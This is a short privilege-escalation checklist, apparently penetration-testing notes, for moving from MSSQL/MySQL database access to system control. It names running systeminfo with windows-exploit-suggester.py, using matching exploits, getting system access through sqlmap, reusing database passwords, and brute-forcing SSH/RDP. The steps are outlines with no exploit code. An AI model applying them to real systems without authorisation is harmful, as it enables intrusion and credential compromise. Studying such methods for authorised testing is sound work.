1. Getting system privileges from MSSQL and MySQL
(1) Generate system information
systeminfo > bmfx.txt
(2) Use windows-exploit-suggester.py to check for unpatched vulnerabilities
(3) Find the exp matching the vulnerability and escalate privileges directly
2. Obtaining system privileges directly
Some servers run the database service with high privileges, so sqlmap can obtain system privileges directly
3. Privilege escalation via social engineering
Some root/sa database passwords are the same as the Windows/Linux system administrator password
4. Account and password brute force
With the accurate account information obtained earlier, try brute-forcing SSH/RDP accounts